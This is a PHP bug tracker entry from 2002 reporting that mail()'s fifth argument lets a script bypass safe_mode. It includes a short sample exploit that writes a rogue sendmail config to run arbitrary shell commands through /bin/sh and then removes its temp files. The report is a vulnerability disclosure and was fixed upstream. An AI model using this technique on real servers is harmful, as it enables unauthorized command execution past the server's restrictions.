|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #17745 bypassing safe_mode with mail()
Submitted: 2002-06-13 12:36 UTC Modified: 2002-07-02 09:55 UTC
From: cliph at isec dot pl Assigned:
Status: Closed Package: Mail related
PHP Version: 4.2.1 OS: Any
Private report: No CVE-ID: None
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
Solve the problem:
50 + 22 = ?
Subscribe to this entry?

 [2002-06-13 12:36 UTC] cliph at isec dot pl
If PHP is configured with safe_mode option enabled, special restriction are set up including limit on external binaries that may be executed from within a PHP script.

The 5th argument to the mail() function (introduced in version 4.0.5) allow specifying command line option to the sendmail binary. Some time ago a bug was found in the mail() function allowing to pass shell meta-characters in the 5th argument, leading to execute arbitrary shell commands or external binaries. This bug was fixed in version 4.1.0.

However, mail() function is still vulnerable because it allows to pass command line arguments to the sendmail binary which gives the ability to influence its behavior (i.e. by using non-default aliases, custom configuration files - other cases are possible with others MTAs)

Passing 5th argument should be disabled if PHP is configured in safe_mode.

Sample exploit that works with sendmail MTA:

-----8<----- bypass_safe_mode.php -----8<-----
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);

mail("nobody", "", "", "", "-C$cf");
-----8<----- bypass_safe_mode.php -----8<-----

Wojciech Purczynski <>
iSEC Security Research


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2002-07-02 09:55 UTC]
This bug has been fixed in CVS. You can grab a snapshot of the
CVS version at In case this was a documentation 
problem, the fix will show up soon at
In case this was a website problem, the change will show
up on the site and on the mirror sites.
Thank you for the report, and for helping us make PHP better.

PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Sun Sep 26 20:03:36 2021 UTC